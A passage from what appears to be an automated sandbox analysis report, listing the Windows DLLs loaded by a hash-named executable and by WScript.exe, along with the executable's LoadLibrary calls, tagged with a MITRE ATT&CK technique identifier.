\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 777f0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"C:\\NTDLL.DLL\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\SHELL32.DLL\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"SSPICLI.DLL\" at base 759b0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\PSAPI.DLL\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\RASAPI32.DLL\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"RASAPI32.DLL\" at base 6e4b0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"RTUTILS.DLL\" at base 73930000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 77650000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 77650000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\WS2_32.DLL\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"WS2_32.DLL\" at base 772d0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 754f0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 75050000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 754e0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"RASMAN.DLL\" at base 724a0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\WINHTTP.DLL\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"WINHTTP.DLL\" at base 71fa0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"CREDSSP.DLL\" at base 751f0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"IPHLPAPI.DLL\" at base 73e90000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73da0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"DHCPCSVC.DLL\" at base 73cb0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"NSI.DLL\" at base 77da0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"CFGMGR32.DLL\" at base 75ce0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"OLEAUT32.DLL\" at base 77a30000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77650000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75ac0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 77650000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\IPHLPAPI.DLL\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"DNSAPI.DLL\" at base 753b0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"RASADHLP.DLL\" at base 71120000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73e00000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\SECUR32.DLL\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"SECUR32.DLL\" at base 75860000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCHANNEL.DLL\" at base 75330000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"NCRYPT.DLL\" at base 75660000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 75200000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\CRYPT32.DLL\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"CRYPT32.DLL\" at base 75d10000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CRYPT32.DLL\" at base 0\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"USERENV.DLL\" at base 75c00000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"GPAPI.DLL\" at base 75100000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"PROPSYS.DLL\" at base 74640000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"COMCTL32.DLL\" at base 749f0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"APPHELP.DLL\" at base 759d0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"CLBCATQ.DLL\" at base 775c0000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6ac00000\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" loaded module \"SETUPAPI.DLL\" at base 76e00000\n \"WScript.exe\" loaded module \"SXS.DLL\" at base 75a30000\n \"WScript.exe\" loaded module \"DWMAPI.DLL\" at base 745e0000\n \"WScript.exe\" loaded module \"CLBCATQ.DLL\" at base 775c0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\VBSCRIPT.DLL\" at base 6a9e0000\n \"WScript.exe\" loaded module \"OLE32.DLL\" at base 77460000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\ADVAPI32.DLL\" at base 773b0000\n \"WScript.exe\" loaded module \"WINTRUST.DLL\" at base 75c20000\n \"WScript.exe\" loaded module \"CRYPTSP.DLL\" at base 75530000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 752c0000\n \"WScript.exe\" loaded module \"ADVAPI32.DLL\" at base 773b0000\n \"WScript.exe\" loaded module \"CRYPTBASE.DLL\" at base 75a20000\n \"WScript.exe\" loaded module \"MSISIP.DLL\" at base 738c0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CRYPT32.DLL\" at base 75d10000\n \"WScript.exe\" loaded module \"IMM32.DLL\" at base 77d80000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHEXT.DLL\" at base 738a0000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCROBJ.DLL\" at base 72260000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 77460000\n \"WScript.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 776d0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter uxtheme.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter bcrypt.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter gdiplus.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter C:\\ntdll.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter rasapi32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter ws2_32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter RASMAN.DLL (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter rtutils.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter RPCRT4.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter NSI.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter CFGMGR32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\en-US\\tzres.dll.mui (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter iphlpapi.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter secur32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter ncrypt.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\crypt32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter crypt32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\CRYPT32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter CRYPT32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter USERENV.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005932)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004276)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004276)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004276)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\advapi32.dll (UID: 00000000-00004276)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter WINTRUST.dll (UID: 00000000-00004276)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00004276)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004276)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004276)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter MSISIP.DLL (UID: 00000000-00004276)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\CRYPT32.dll (UID: 00000000-00004276)\n \"WScript.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00004276)\n 